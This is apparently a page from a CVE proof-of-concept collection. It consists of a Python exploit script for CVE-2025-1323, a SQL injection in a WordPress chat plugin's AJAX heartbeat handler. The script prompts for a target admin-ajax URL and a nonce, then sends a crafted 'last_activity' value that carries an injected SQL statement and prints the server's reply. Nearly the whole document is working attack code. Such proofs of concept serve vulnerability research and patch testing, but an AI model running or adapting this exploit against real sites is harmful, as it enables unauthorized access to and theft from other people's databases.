4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-1323.py PY
import requests
import json
from urllib.parse import quote

def encode_databeat_payload(last_activity_payload, token="bXktY2hhdA=="):
    data_structure = [{
        "action": "rcl_chat_get_new_messages",
        "success": "rcl_chat_beat_success",
        "data": {
            "last_activity": last_activity_payload,
            "token": token,
            "update_activity": 1,
            "user_write": 0
        },
        "beat_name": "rcl_chat_beat_core"
    }]
    return quote(json.dumps(data_structure))

def send_payload(url, ajax_nonce, last_activity_payload):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }

    databeat = encode_databeat_payload(last_activity_payload)
    post_data = f"action=rcl_beat&databeat={databeat}&ajax_nonce={ajax_nonce}"

    response = requests.post(url, headers=headers, data=post_data)
    return response

def main():
    target_url = input("Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): ").strip()
    ajax_nonce = input("Enter ajax_nonce value: ").strip()

    payload = "'; SELECT user(); --"
    print(f"\n[*] Sending payload: {payload}\n")

    response = send_payload(target_url, ajax_nonce, payload)

    if response.ok:
        print("[+] Response received:")
        print(response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)

if __name__ == "__main__":
    main()